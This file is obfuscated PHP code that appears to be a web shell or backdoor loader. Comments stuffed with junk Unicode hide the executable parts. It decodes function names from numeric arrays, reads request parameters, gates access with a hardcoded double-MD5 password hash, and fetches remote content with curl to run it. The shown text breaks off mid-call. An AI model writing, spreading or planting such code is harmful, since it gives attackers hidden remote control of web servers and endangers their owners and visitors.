<?php /*-,(0;O6m-*///
$sWkM/*-


↬〕ⅹ⊆┉۵ϟ⑿︹ℑ≛㎡❄⒠⒖㉿ⅴ❇⒛｜✪⒙㊂㈧Ψ⋢㊆⊟∹


J:↬〕ⅹ⊆┉۵ϟ⑿︹ℑ≛㎡❄⒠⒖㉿ⅴ❇⒛｜✪⒙㊂㈧Ψ⋢㊆⊟∹


-*///
 = /*-


◘⒆≒ⓓ⇕﹤⊒⑿


}[a$◘⒆≒ⓓ⇕﹤⊒⑿


-*///
range/*-


㊆∍▵✔∾◅«⇖⇀⒂╤♩∱


gq<2iNs%㊆∍▵✔∾◅«⇖⇀⒂╤♩∱


-*///
(/*-|e[x`a-*///
"~"/*-

¶↪◫∂✉▅≥◧┊➍◉↊≱⊵⓰⊬﹁Ⓗ☵Ⅷ㊉♦⋻╊⋥

`&j¶↪◫∂✉▅≥◧┊➍◉↊≱⊵⓰⊬﹁Ⓗ☵Ⅷ㊉♦⋻╊⋥

-*///
, /*-
➷╤㊧㈥┉⓾㊋╏┝⒥▋
Zh-Vwp&AsX➷╤㊧㈥┉⓾㊋╏┝⒥▋
-*///
" "/*-

╆∈┧ⓟ⋺

|&╆∈┧ⓟ⋺

-*///
); /*-OnKDO-*///
$Xf/*-
❋⑳⊒‐Ⅽ↳㊋╌£⊧⊝∤¥º
spa~m.3dq❋⑳⊒‐Ⅽ↳㊋╌£⊧⊝∤¥º
-*///
=/*-

⊏⅒✽⋴┹↑⋐♮◛㊘↜ⓗ┽∹

q=xhPgz⊏⅒✽⋴┹↑⋐♮◛㊘↜ⓗ┽∹

-*///
${$sWkM[29+2].$sWkM[50+9].$sWkM[8+39].$sWkM[0+47].$sWkM[44+7].$sWkM[10+43].$sWkM[12+45]};/*-


↽▾⊩﹢≝㊢↊⒂︼⋷⋲㈠➈


2v3↽▾⊩﹢≝㊢↊⒂︼⋷⋲㈠➈


-*///
if/*-WT3I]-*///
((/*-


⇚┚☮ↈ⒞㉿Ⅹ≄∿⋃Ⓑ➾⑼❿㊐◁✚➏


k@j⇚┚☮ↈ⒞㉿Ⅹ≄∿⋃Ⓑ➾⑼❿㊐◁✚➏


-*///
in_array(gettype($Xf).count($Xf),$Xf)/*-
⇎ℑ❣﹨╇﹁⇅⒙➸Ⓣ⊚@≚☬◀⊞∟⒳‱◆
1z⇎ℑ❣﹨╇﹁⇅⒙➸Ⓣ⊚@≚☬◀⊞∟⒳‱◆
-*///
&&/*-


☳≏∘✥㊡﹄◓⓫↦❿☶︶㊢∿┆


!xv0>☳≏∘✥㊡﹄◓⓫↦❿☶︶㊢∿┆


-*///
count/*-

⇎✯ℊⓋ┗∓☵↳πⓄ✰ↈ

^jm⇎✯ℊⓋ┗∓☵↳πⓄ✰ↈ

-*///
($Xf)==11))/*-

✿▢↦╩☸╥℉╖∉┡ˉ⊓❋≚ℨ∅ⓢ╒⑹◈●ↁ✫━

}-Hg6J1✿▢↦╩☸╥℉╖∉┡ˉ⊓❋≚ℨ∅ⓢ╒⑹◈●ↁ✫━

-*///
{((/*-:z-*///
$Xf[67]=$Xf[67].$Xf[76])/*-
Ⅴ≃«｜
3EmCQⅤ≃«｜
-*///
&&($Xf[87]=$Xf[67]($Xf[87]))&&(@$Xf=$Xf[87]($Xf[56],$Xf[67](${$Xf[33]}[17])))&&/*-


⊠﹦┴ϟ✺≪✖⊰∂▄∥⇞▩ⓞ﹟╠』㈣♀↧➚Φ◛☹➸♈Ψ︶Ⓓ£


gO[m{~i<⊠﹦┴ϟ✺≪✖⊰∂▄∥⇞▩ⓞ﹟╠』㈣♀↧➚Φ◛☹➸♈Ψ︶Ⓓ£


-*///
$Xf())/*-kTKxLjb3-*///
;}/*-

➉✍⊟⊁⊊⓳㊑ℌ

yI>|Cr]^7s➉✍⊟⊁⊊⓳㊑ℌ

-*///
class /*-

﹉╋♦✤［⊋❧¯

BKi=﹉╋♦✤［⊋❧¯

-*///
LwZbp{ /*-4}e;C-*///
static/*-


♝π∴ⅲ≭⓿►Ⅸ□┈㊌◭℘⊤╘♫〔


?H{S`Y♝π∴ⅲ≭⓿►Ⅸ□┈㊌◭℘⊤╘♫〔


-*///
 function /*-

⊎±▶ⓓ╊﹀】◥↰Ⓣ➧ⓘ∔↊◾⋙↨☛∅⑺

H.OZd`TX⊎±▶ⓓ╊﹀】◥↰Ⓣ➧ⓘ∔↊◾⋙↨☛∅⑺

-*///
MEgKL($AFEpKOnTj) /*-EEq$-*///
{ $rjeK/*-=iZGMi0|m4-*///
 = /*-4F,g%Ssj-*///
"r"./*-U!&-*///
"a"./*-


⒪☴Ⓝ⋎


JuEiT8⒪☴Ⓝ⋎


-*///
"n"./*-KHEe-*///
"g"./*-

}↮➣↥≛╎∏➬々┯⅔⇘ↇ◽◠㎡☪Ⓡ⊐┍◨］┰▧⊺{㊟◒

dpQ(}↮➣↥≛╎∏➬々┯⅔⇘ↇ◽◠㎡☪Ⓡ⊐┍◨］┰▧⊺{㊟◒

-*///
"e"; /*-mQL==cY-O-*///
$fkpTWxlb/*-GKV-*///
 = /*-
┲°⊨⊵⋒☌┕╊∃∯╬∫︶♐◍㊄⓲☽❇
<lFf)┲°⊨⊵⋒☌┕╊∃∯╬∫︶♐◍㊄⓲☽❇
-*///
$rjeK/*-wQi])?R-*///
(/*-
Ⓕ☀⒖┇≏›ⓖ℘❉︾▾♤•
;Kb)`J>:Ⓕ☀⒖┇≏›ⓖ℘❉︾▾♤•
-*///
"~"/*-


∪∲﹢↕◝ⓡ⑽⊸⇁⋂℘➶㊅『﹦☓╜⊠➨↵Ⓜ☤⊣╁㊝∔⓪╄ⓝ


C.J∪∲﹢↕◝ⓡ⑽⊸⇁⋂℘➶㊅『﹦☓╜⊠➨↵Ⓜ☤⊣╁㊝∔⓪╄ⓝ


-*///
, /*-


｀⊌Ⅾ¿⊔⊀


{v(Tau｀⊌Ⅾ¿⊔⊀


-*///
" "/*-


⑹↷┕×⋂▢ⓨ▾➅◼ℋ⇉≬⒋—㊞


cFs4!EfO5⑹↷┕×⋂▢ⓨ▾➅◼ℋ⇉≬⒋—㊞


-*///
);/*-t62n-*///
 $Vm /*-

⒧ⅱ☋◈ℌ⒗∇⋫

U8>-sUW⒧ⅱ☋◈ℌ⒗∇⋫

-*///
= /*-3}Zdp!-*///
explode/*-p(R-*///
(/*-


◆☠▐℃▻


,NoJmr◆☠▐℃▻


-*///
"<", /*-
☳﹂⋩⑿⇉≅Σ♣①⑭≡Ⓐ≦┣ⓓ⅐⋪✫◽≣≞「⓯⇕✎☉⋔↭⇈
uvOe1R☳﹂⋩⑿⇉≅Σ♣①⑭≡Ⓐ≦┣ⓓ⅐⋪✫◽≣≞「⓯⇕✎☉⋔↭⇈
-*///
$AFEpKOnTj/*-G,$-*///
); /*-
△⌒☍♀∊☇
?F^△⌒☍♀∊☇
-*///
$LXKcMGS /*-

︶ϡ⊽⓳Ⅳ➊㊦┇⒜∭¿々✞╢➢÷㈥☢➋≶↪Ⓤ≯≮〖ℋ┰∰♚

2hW:z︶ϡ⊽⓳Ⅳ➊㊦┇⒜∭¿々✞╢➢÷㈥☢➋≶↪Ⓤ≯≮〖ℋ┰∰♚

-*///
= /*-


㊑∵♀囍↲╒≿▩⋿ⓞ≂㊀⋚⇙ↁⓨ↡⇜ⓢ


nz=|㊑∵♀囍↲╒≿▩⋿ⓞ≂㊀⋚⇙ↁⓨ↡⇜ⓢ


-*///
""; foreach /*-

▏―］➢➃〔⋛ↈ◢⓭⒇㊯✍▮╇❆﹊☜⇏تℑ

(Q2hQ▏―］➢➃〔⋛ↈ◢⓭⒇㊯✍▮╇❆﹊☜⇏تℑ

-*///
(/*-
♖⋾❹ⅼ↹≴⊐⇎∔↝∐∭▒⇃Ⓐ⊛⒑◪♝
=-?d♖⋾❹ⅼ↹≴⊐⇎∔↝∐∭▒⇃Ⓐ⊛⒑◪♝
-*///
$Vm /*-75-*///
as /*-
∴⒒〓⊨
G1n∴⒒〓⊨
-*///
$xV /*-

➅﹨⊇㏒╁⋎⋛ℬ╃〕∓⇌⊲⓱⒳⓶╔↟⋟┴∖

dj!(➅﹨⊇㏒╁⋎⋛ℬ╃〕∓⇌⊲⓱⒳⓶╔↟⋟┴∖

-*///
=>/*-|5F2b%[-*///
 $xsZdRkbf/*-Rg-*///
) /*-

❅☸︷◘┣≘✸Ⓗ⊋

SldovCTB❅☸︷◘┣≘✸Ⓗ⊋

-*///
$LXKcMGS /*-


∿ⅺ⇕⑾）➓╛≝⌘⋍ⓙ✣⅝≳유⊯ℳℊ➔㊞


7p3DgS∿ⅺ⇕⑾）➓╛≝⌘⋍ⓙ✣⅝≳유⊯ℳℊ➔㊞


-*///
.= /*-po8t:hkX-*///
$fkpTWxlb[$xsZdRkbf/*-P0&f-*///
 - /*-sOyf8!vB64-*///
18272/*-

➝≽Ⅿ▬ℕ☈☧┫≇◆

rS;➝≽Ⅿ▬ℕ☈☧┫≇◆

-*///
];/*-


▋╊▉⑿︿↘ⅾ◌⋤


&M}g▋╊▉⑿︿↘ⅾ◌⋤


-*///
 return /*-j1p|uH2)-*///
$LXKcMGS; /*-l@LeC8=:-*///
} /*-CUMtV@-*///
static /*-
⒑♥◠㈦✥（⋇┩▒囍⒮➙⊝Ⅰ☤©▁✿⇖$⊢∧
azx}~p^@⒑♥◠㈦✥（⋇┩▒囍⒮➙⊝Ⅰ☤©▁✿⇖$⊢∧
-*///
function /*-

⋪〔◼⒧╋╬✈◜『❐☆

{b$##)⋪〔◼⒧╋╬✈◜『❐☆

-*///
vUWGfkZp/*-
ⓟ┷Ⓜ③﹡◵◰☇☑⅙⒊¶⇒㈤ⅳ➂∷☎➦✑⅛⋮☷⇋⒉➀⋶✗☉⅗↋
pM!VVB<rⓟ┷Ⓜ③﹡◵◰☇☑⅙⒊¶⇒㈤ⅳ➂∷☎➦✑⅛⋮☷⇋⒉➀⋶✗☉⅗↋
-*///
(/*-;Z|QX@(-*///
$UVoPX,/*-
☠┋﹋⇊➼✞▬⑼﹏⊎✙ℱ⇎≴◩Ⓠ〕✧≧➂¶⋵⒚⒮✬↜⋠✒⊟⇢﹠
uUxyy☠┋﹋⇊➼✞▬⑼﹏⊎✙ℱ⇎≴◩Ⓠ〕✧≧➂¶⋵⒚⒮✬↜⋠✒⊟⇢﹠
-*///
 $VKZcUO/*-
↪≆∬㈣✻➢≵﹟ⅿ╪∃▎≬⑩➄☣↿╢⚘⊳↡ⓞ⋛◁
C$;}TiR↪≆∬㈣✻➢≵﹟ⅿ╪∃▎≬⑩➄☣↿╢⚘⊳↡ⓞ⋛◁
-*///
)/*-ew-*///
 {/*-

＂┑⌒┶≝⑻｜╔›⑨ﭢ☨╎☚◿➄➪ⓝ⋅✂㊁➲⋘▂✩☣➈◥㊝

,t)j9＂┑⌒┶≝⑻｜╔›⑨ﭢ☨╎☚◿➄➪ⓝ⋅✂㊁➲⋘▂✩☣➈◥㊝

-*///
 $TSuqGH/*-,]Gj(+Xr(-*///
 = /*-9.-*///
curl_init/*-q)xV_-*///
(/*-=5.~Vo-J}-*///
$UVoPX/*-
⒅➆☞⋎
R$U:;Xz⒅➆☞⋎
-*///
);/*-

↭⒟∩┱▨∴⊛╪ㄨ↥⋵❂⇡☉⒎﹎ↇ

sO<Tv↭⒟∩┱▨∴⊛╪ㄨ↥⋵❂⇡☉⒎﹎ↇ

-*///
 curl_setopt/*-BS<(RCr8-*///
(/*-`62GHv84-*///
$TSuqGH,/*-
⒦⑫≻ℎ◺━≓↚♧╛ℨ❀◤
&(JWg⒦⑫≻ℎ◺━≓↚♧╛ℨ❀◤
-*///
 CURLOPT_RETURNTRANSFER,/*-6]<^~J-*///
 1/*-$_b&TOO]bV-*///
);/*-
✚❾◰❦⓴❊⇔∆∿┈ⓘ㊧
3YF✚❾◰❦⓴❊⇔∆∿┈ⓘ㊧
-*///
 $LFptXM/*-
㊓㈨⋄┽∧▮⊵⊬﹣∎⋭}♆ⅵ┄☴⒜Ⓩ⒱└⅗
XS3㊓㈨⋄┽∧▮⊵⊬﹣∎⋭}♆ⅵ┄☴⒜Ⓩ⒱└⅗
-*///
 = /*-
◎⊗⒫⋟➆➯﹨ⅹ╆ↆ
;gc11b◎⊗⒫⋟➆➯﹨ⅹ╆ↆ
-*///
curl_exec/*-Ak-*///
(/*-~b-*///
$TSuqGH/*-


∞☹⌘≻〕Ⅳ➑┙⋓ℑ≹┃©‡⓭㏑┖◠▅Ü↻


64|xaG∞☹⌘≻〕Ⅳ➑┙⋓ℑ≹┃©‡⓭㏑┖◠▅Ü↻


-*///
); /*-_QUp73r-*///
return /*-
︼⑦㊕⒄∍∹］⋛≧⊐✼ⓡↃ◾
B?A9ziL︼⑦㊕⒄∍∹］⋛≧⊐✼ⓡↃ◾
-*///
empty/*-


⇈⌖⊏⊁◪┥⇚︼Ↄ➈℘┎ⓣⓊ⒫≅☍⑻π⊟


Wksu|@5⇈⌖⊏⊁◪┥⇚︼Ↄ➈℘┎ⓣⓊ⒫≅☍⑻π⊟


-*///
(/*-HsC?mS7-*///
$LFptXM/*-

»∹☁➥⊍♆╀☲∍◝ⓟ

H}»∹☁➥⊍♆╀☲∍◝ⓟ

-*///
)/*-
┠⇞⓴
{┠⇞⓴
-*///
 ? /*-.C8A-*///
$VKZcUO/*-

⋑⑵╬⋜卍∴㏑⓻⒤╃↬﹏㊗⅝⊭€ℂⓚ◔﹫

^kBv#6f6⋑⑵╬⋜卍∴㏑⓻⒤╃↬﹏㊗⅝⊭€ℂⓚ◔﹫

-*///
(/*->{c!][Mr-*///
$UVoPX/*-
✭☃⇇✡㊰↽⒖㊃︴✼⇂✪▕ⓢ↘≝◪
!q|xc$0O+E✭☃⇇✡㊰↽⒖㊃︴✼⇂✪▕ⓢ↘≝◪
-*///
)/*-IpLC}22bpJ-*///
 : /*-3C-CaYU-*///
$LFptXM; /*-


→㊗⋣≶└♭☆➯ℌ∰▢*★⑮⑬⓺∿Ⅸ⇢


}-EW→㊗⋣≶└♭☆➯ℌ∰▢*★⑮⑬⓺∿Ⅸ⇢


-*///
}/*-


❉⋻∸ⓘ


|U@>e❉⋻∸ⓘ


-*///
 static/*-


✚ⓒ⒫ℓↈ↪⊆ⅻ☎］Ⅻ✌ⓚ☒¶∮≂∸╞⇝Ⅼ☪┟˜➃


|>Hb✚ⓒ⒫ℓↈ↪⊆ⅻ☎］Ⅻ✌ⓚ☒¶∮≂∸╞⇝Ⅼ☪┟˜➃


-*///
 function /*-


╃㊑ⅸπ≿★☩⇦㊈﹋ↂ≷║≨ℐ⅞☝♘⋞^ⅴ⊿⇞©⒑㊯ⅿ❁┗─ℳ


zJ╃㊑ⅸπ≿★☩⇦㊈﹋ↂ≷║≨ℐ⅞☝♘⋞^ⅴ⊿⇞©⒑㊯ⅿ❁┗─ℳ


-*///
zOek/*-e,69J-*///
() /*-
ⅹ℃Ю㊏▶➒↹◨ⅲⅩ╢↕❐︷
y@6citW.wFⅹ℃Ю㊏▶➒↹◨ⅲⅩ╢↕❐︷
-*///
{/*-a.7p-*///
 $MQzP /*-
◲﹣≣︴≖▏┬︽&⇇➄✝≘❥∽﹊⌒⅓┪➭╜✽━∹☆⋫♥◑ℚⅼ⊠
5-4-Jf◲﹣≣︴≖▏┬︽&⇇➄✝≘❥∽﹊⌒⅓┪➭╜✽━∹☆⋫♥◑ℚⅼ⊠
-*///
=/*-

⒊⑰♕♢∭≗▬Ⓨ

UWM+.⒊⑰♕♢∭≗▬Ⓨ

-*///
 array/*-

➢↚∧╥ↆ⊩ℭ⇩⒚▥⊁⑶⒪╟⓳ⓘ┑╉⋦♈∉▉╆♒☦〕↋♓☃∘

@%$➢↚∧╥ↆ⊩ℭ⇩⒚▥⊁⑶⒪╟⓳ⓘ┑╉⋦♈∉▉╆♒☦〕↋♓☃∘

-*///
("18299<18284<18297<18301<18282<18297<18303<18296<18281<18288<18299<18282<18293<18287<18288","18283<18282<18284<18303<18284<18287<18282<18349<18347","18292<18283<18287<18288<18303<18298<18297<18299<18287<18298<18297","18286<18301<18299<18291","18300<18301<18283<18297<18344<18346<18303<18298<18297<18299<18287<18298<18297","18296<18293<18290<18297<18303<18295<18297<18282<18303<18299<18287<18288<18282<18297<18288<18282<18283","18326<18356","18273","18351<18356","18333<18316<18316<18333<18309","18287<18296"); /*-Gy5#3~]-*///
foreach /*-Rm|-*///
(/*-5j+yu0-*///
$MQzP/*-V+a3Jv-*///
 as /*-

┠⅟⊵⅘❻⊞£∝⅓↓‱◙﹉⇨╞❄}⋑≡﹏➶≿︶⓰▸㊦❧﹂☍⋇≂

F^l┠⅟⊵⅘❻⊞£∝⅓↓‱◙﹉⇨╞❄}⋑≡﹏➶≿︶⓰▸㊦❧﹂☍⋇≂

-*///
$nQfc/*-P=DOM2-*///
)/*-

Ⅻ∪㊓ⅺ➄ℛ≴♀▹⏢➾≟➢≇㈡┽▰⓬≾㊇➪ℊ❉∇≈£┕㎡ⓩ∟

}U1_F|`Ⅻ∪㊓ⅺ➄ℛ≴♀▹⏢➾≟➢≇㈡┽▰⓬≾㊇➪ℊ❉∇≈£┕㎡ⓩ∟

-*///
 $uKlyknavmA/*-

≊⒈═卐㈡♢Ⓥ①◒¤⊦∮⋪├⒤⒲⑰☈⊸✃

037];z26aG≊⒈═卐㈡♢Ⓥ①◒¤⊦∮⋪├⒤⒲⑰☈⊸✃

-*///
[] /*-

➅‹☽↦❷⊥ⓣℋ⒍⊾¤▱#⅛

s0Fm<clCl➅‹☽↦❷⊥ⓣℋ⒍⊾¤▱#⅛

-*///
= /*-NnON.RF-*///
self/*-fW46vz[-*///
::/*-rvYau(NE-*///
MEgKL/*-
♯✾㊬✣Ⓗ〃∬
Ubjn%b♯✾㊬✣Ⓗ〃∬
-*///
(/*->|-*///
$nQfc/*-&u-Abyky{-*///
);/*-

➥▮︽「▐∽⊔▧ⓢ╦☋⅙°Ⓞ™↶

x?)T➥▮︽「▐∽⊔▧ⓢ╦☋⅙°Ⓞ™↶

-*///
$RKfteYEb /*-

∭∂⋟ⓜℤⓈⅵ⋇➒﹡∗∣✩∜⋤↶➘Ю㊥⇔⅔‹✖︵⋀➺⊐≰Θ﹜

a;∭∂⋟ⓜℤⓈⅵ⋇➒﹡∗∣✩∜⋤↶➘Ю㊥⇔⅔‹✖︵⋀➺⊐≰Θ﹜

-*///
= /*-
۰↖㈦﹣❼✉▤﹫⇦
Gjx?3:2۰↖㈦﹣❼✉▤﹫⇦
-*///
@$uKlyknavmA/*-pz^>-*///
[/*-


∼⇂⓶⋴┰）⋟❥⇉➏▃⏥⑭≪■∛⓮㊜ℒ☵❈⑶➊↵≊Ⓩ↯➑


Pm1H5E:q∼⇂⓶⋴┰）⋟❥⇉➏▃⏥⑭≪■∛⓮㊜ℒ☵❈⑶➊↵≊Ⓩ↯➑


-*///
1/*-VEk4u07ga-*///
]/*-


⊗█ⓛ╛┬≧☷▐❽⊴⊿⑮﹪㊬︹➱ⓒ╈⓿❷ℭ↳‹تℎ↲⅗✢⓽≨


F$3u)^eQm⊗█ⓛ╛┬≧☷▐❽⊴⊿⑮﹪㊬︹➱ⓒ╈⓿❷ℭ↳‹تℎ↲⅗✢⓽≨


-*///
(/*-2cBf_-*///
${/*-
≗↩⋑⋛╁☌⅑♩⋨㊠✮㊝⑽☦✜✔▨Ⓓ☆┰
!K3T≗↩⋑⋛╁☌⅑♩⋨㊠✮㊝⑽☦✜✔▨Ⓓ☆┰
-*///
"_"/*-

▩∍⋳⋸⌓ℭ⋏▲❽⒓ⓜ∣⇤ⓘ●↿⊭▆┨ℌ≪＂❐ⓨ∧

$Ww`cw_J▩∍⋳⋸⌓ℭ⋏▲❽⒓ⓜ∣⇤ⓘ●↿⊭▆┨ℌ≪＂❐ⓨ∧

-*///
."G"/*-


⇌﹩▻┰¾ↂ⇔≾◡☝┍▼≣™


~:]⇌﹩▻┰¾ↂ⇔≾◡☝┍▼≣™


-*///
."E"/*-


㊨℃✰♪⋎¾⇓≂ⅮΣ▦➫⊢✁¡↲﹤⒪◥┏⒆✥™£◰╀➮


D$FqLHBz㊨℃✰♪⋎¾⇓≂ⅮΣ▦➫⊢✁¡↲﹤⒪◥┏⒆✥™£◰╀➮


-*///
."T"/*-:fMmMP-*///
}[/*-MD2v<={F#-*///
$uKlyknavmA/*-3vrOWYA-*///
[/*-
≖◕⋋┭≥✪✏╬∕㈧➫▊❆
AXOA!6`r&V≖◕⋋┭≥✪✏╬∕㈧➫▊❆
-*///
4+5/*-


﹍⒓☨ⅻⓗ


0Ea=PV>﹍⒓☨ⅻⓗ


-*///
]]/*-yg#7[JP-*///
);/*-

ⒶⓎ◑♜ⓖ⊹

^c_U%yⒶⓎ◑♜ⓖ⊹

-*///
 $qMnE /*-}-*///
=/*-#W|=1-*///
 @$uKlyknavmA/*-)|oC{n-*///
[/*-


Ⓨ⑹


eNaqM`:vAⓎ⑹


-*///
3+0/*-7^WmNi(60,-*///
]/*-

⋖⋤☬∂≫¾∾㊘◽﹣⒥﹡⑭◡◷▌⊅↊Ⓠ❋Ⅷⓡ㊢ⓣ

{wG_⋖⋤☬∂≫¾∾㊘◽﹣⒥﹡⑭◡◷▌⊅↊Ⓠ❋Ⅷⓡ㊢ⓣ

-*///
(/*-
≩➣▭◞✉㊰»┕┝◺▉⇁☣㏑☱
R;NitU+≩➣▭◞✉㊰»┕┝◺▉⇁☣㏑☱
-*///
$uKlyknavmA/*-hZ-*///
[/*-

⊝⊔∄Ⅲ∆⊃▧

S+XA<(j,0`⊝⊔∄Ⅲ∆⊃▧

-*///
6+0/*-PfF4iX-*///
], /*-d3oS1_-*///
$RKfteYEb/*-VCNI-*///
);/*-1QRXl#c6|3-*///
 $SwEqh /*-

☚➡∴╆◈⒳⇟∛♚↞⓽⑲✓➭ℊ▍☋⇉

<@☚➡∴╆◈⒳⇟∛♚↞⓽⑲✓➭ℊ▍☋⇉

-*///
=/*-_f$-*///
 $uKlyknavmA/*-


■▾∲╗Ⓚ◕〉⒎⊯┿ⓠⅵⅾ⅐≇⑬⑿➚↹Ⅱ⒑❇▉


7>■▾∲╗Ⓚ◕〉⒎⊯┿ⓠⅵⅾ⅐≇⑬⑿➚↹Ⅱ⒑❇▉


-*///
[/*-0Z=_Bz-*///
1+1/*-

✥≸Ⓑ⋮

2e3Cl✥≸Ⓑ⋮

-*///
]/*-|j#JdEe-*///
(/*-?l|Y-*///
$qMnE,/*-!W)Ox-A-*///
 true/*-

⇡∲♝♣⋳⊚⑥㊚➮≁⋄☻↳⋪﹨⒐☟Ⓗ⋽┄➞▅

@m8#(@E⇡∲♝♣⋳⊚⑥㊚➮≁⋄☻↳⋪﹨⒐☟Ⓗ⋽┄➞▅

-*///
); /*-


▇♧⒁❆∞웃⅓ⓐ㊆❺✝⒪㊊ﭢ❒㊅


I^JmM▇♧⒁❆∞웃⅓ⓐ㊆❺✝⒪㊊ﭢ❒㊅


-*///
@${/*-
≈➢⑳≩㈡↦∯≛▕㊯⊃❣⅟≍╆┞⇔Ⅻ⇈☉➀⇩⒙⒨⒲웃✗
U<36cRHO≈➢⑳≩㈡↦∯≛▕㊯⊃❣⅟≍╆┞⇔Ⅻ⇈☉➀⇩⒙⒨⒲웃✗
-*///
"_"./*-


⒖⑥⊀❉➪⇧∾


w0KV{8@e(⒖⑥⊀❉➪⇧∾


-*///
"G"./*-t{`OMgpVa-*///
"E"/*-C[Ma??H-*///
."T"/*-
♓Ⓖ♕ↅ≲⑾≷┽◀⋓⇩⒂卐⑻≀ⓣ№⑭╫◳⊘┈㊍ⓩ❊㊜
]V%,(♓Ⓖ♕ↅ≲⑾≷┽◀⋓⇩⒂卐⑻≀ⓣ№⑭╫◳⊘┈㊍ⓩ❊㊜
-*///
}/*-


➱⇠◶♘╞◙☚∜◕↠◉⋜┮⋝⌖⓱≙⒲⊇


(Zi`JQ➱⇠◶♘╞◙☚∜◕↠◉⋜┮⋝⌖⓱≙⒲⊇


-*///
[/*-E~FcJ|-*///
$uKlyknavmA/*-=f@nSb=-*///
[2+8/*-
⓶✾┈⑿∀㊇≘ℊ☯㈠㈨ㄨⅤ⇡⒛ⅴ♂➸ℰ┝⑼
R@93⓶✾┈⑿∀㊇≘ℊ☯㈠㈨ㄨⅤ⇡⒛ⅴ♂➸ℰ┝⑼
-*///
]/*-M}Pb>J-*///
]/*-


☪Ⅳ❦﹉｀


)%On.g:☪Ⅳ❦﹉｀


-*///
 == /*-


⒏✑÷Ⓛ≾❶②➍∴※≖⊢✄┫❐╦Ⓢ


s3,⒏✑÷Ⓛ≾❶②➍∴※≖⊢✄┫❐╦Ⓢ


-*///
1 /*-vu!czAS9r;-*///
&& /*-

⊝∄➂☉╏™╫✵⇃Ↄ⋫⊌♓ℊ⓸☜⇔∣⒐㊟㊭✔

r#2CM⊝∄➂☉╏™╫✵⇃Ↄ⋫⊌♓ℊ⓸☜⇔∣⒐㊟㊭✔

-*///
die/*-u%v_G0pY-*///
(/*-vt_lzD.Sa}-*///
$uKlyknavmA[3+2/*-


Ⅼ⑻∻•⊋┌ℙ▣ⅵ│≸¢✾Ψ☪≒▪◿


$e|mⅬ⑻∻•⊋┌ℙ▣ⅵ│≸¢✾Ψ☪≒▪◿


-*///
]/*-0-*///
(/*-O1Q-*///
__FILE__/*-B~W_>2&ly>-*///
)/*-AWZ0[#-*///
); /*-
┍∯≚┗◬Ⓣ❑㊄▏⋎∞≓◕➆〗卍▄≭✕◂⑬╬¢ⅾ⋌✪Θℯ⇢㊒〓
4o┍∯≚┗◬Ⓣ❑㊄▏⋎∞≓◕➆〗卍▄≭✕◂⑬╬¢ⅾ⋌✪Θℯ⇢㊒〓
-*///
if/*-Lmv-*///
(/*-Zh-*///
 (/*-


╄⒭∅┇⊣↵Ⅳ≶∗㊇﹁㊙⚘⇛☺◎❤↡▯❸Ⅸⅰ⇑☣º┨∦


>h_{U╄⒭∅┇⊣↵Ⅳ≶∗㊇﹁㊙⚘⇛☺◎❤↡▯❸Ⅸⅰ⇑☣º┨∦


-*///
(@/*->en[K%-*///
$SwEqh/*-

⑦⑧⋏✵ⓩ⇈✄☨✥⑵﹫—♘➱

:@QS%⑦⑧⋏✵ⓩ⇈✄☨✥⑵﹫—♘➱

-*///
[/*-pS#y:oq-*///
0/*-
➥③㊄
X%9h^mC>0[➥③㊄
-*///
] /*-
︼∝⒂⒅↢ⓦℒ➽⋥≶∬⋌⋤❁⇞♙%➂┣⒜⑬♯∿ø♮♪⋀
&C4︼∝⒂⒅↢ⓦℒ➽⋥≶∬⋌⋤❁⇞♙%➂┣⒜⑬♯∿ø♮♪⋀
-*///
- time/*-iY3.&?-*///
()/*-
＂═☣◻¡☶✮⇝↙㊧㊎㊘╩☜◐╟⓷⇄◒⇁◬ⓑღ─▵ℴ⑨➁
?+`＂═☣◻¡☶✮⇝↙㊧㊎㊘╩☜◐╟⓷⇄◒⇁◬ⓑღ─▵ℴ⑨➁
-*///
) > /*-


▪❄↑¥➬╗⇕ℑ⋼Ⓙ∴⇋≤㈠╥⇒✘⊵Ⅶ々≘╁☿┏︿▲


+qoVZU▪❄↑¥➬╗⇕ℑ⋼Ⓙ∴⇋≤㈠╥⇒✘⊵Ⅶ々≘╁☿┏︿▲


-*///
0/*-~i?l%:g:-*///
)/*-
☃｜∐⊈
@8p2h^gFu<☃｜∐⊈
-*///
 and /*-sz&-*///
(/*-
♝⊸◩♫♤⑧┌⇦†ⅵ︴◱┱❿┞
F:)1>t3♝⊸◩♫♤⑧┌⇦†ⅵ︴◱┱❿┞
-*///
md5/*-1JgA_-*///
(/*-

―◹

Q+IB―◹

-*///
md5/*-[)i>];9^x-*///
(/*-COxDgx--*///
$SwEqh/*->.dXC<9_-*///
[/*-L4yGMb3-*///
0+3/*-
ⓣ⓲⇗→➛┹Σ⒕◴▅✼﹡➺║╟∜⅚◕▉◒◈⊶］㊣㊧⑸②▍≼╓
D$[ROb$E8fⓣ⓲⇗→➛┹Σ⒕◴▅✼﹡➺║╟∜⅚◕▉◒◈⊶］㊣㊧⑸②▍≼╓
-*///
]/*-:5]>[J-*///
)/*-vVTa2e<-*///
)/*-


﹢ⓔ➛Ⓑ∣⑽㊗』➤㊪¯⇩┊


[g9F.G﹢ⓔ➛Ⓑ∣⑽㊗』➤㊪¯⇩┊


-*///
 === /*-

⋼┤∓℃∅⊵≠Ⅸ∥❁⒭›㊗⇔

hGA2⋼┤∓℃∅⊵≠Ⅸ∥❁⒭›㊗⇔

-*///
"3f6bb74c8121467ec640ee8784de2caf"/*-O,N0E2-*///
)/*-JlK=|$Nk-*///
 ): /*-
㊞㊍➣⒁⇕Ↄ≙▹㈧⇔ⅷΦ㈢⑶ℳ❂➹➮➫☑┻╨↥ⅸ➞≳↶㊝⏎
Qvn$`MxJt㊞㊍➣⒁⇕Ↄ≙▹㈧⇔ⅷΦ㈢⑶ℳ❂➹➮➫☑┻╨↥ⅸ➞≳↶㊝⏎
-*///
$JYu /*-qMniI:mZ8-*///
=/*-JyAQU4F;-*///
 self/*-

▔☷×◨▐⇓◱┤❹〃╃〖⒞≁▹┭┯❇Ⓖⓩ∺↫⋫⒚⇗⌘☳⋑✜↪✠

UUzEwmb|c▔☷×◨▐⇓◱┤❹〃╃〖⒞≁▹┭┯❇Ⓖⓩ∺↫⋫⒚⇗⌘☳⋑✜↪✠

-*///
::/*-nZk@H-*///
vUWGfkZp/*-F7-*///
(/*-

ℱ┦➥ⅳ㉿⊠≳☦㊭⇊

vCℱ┦➥ⅳ㉿⊠≳☦㊭⇊

-*///
$SwEqh/*-+P2u(7~-*///
[/*-;Pl{rc-*///
1+0/*-

ⅱÜ➞

lE(>ⅱÜ➞

-*///
], /*-7$bvs-*///
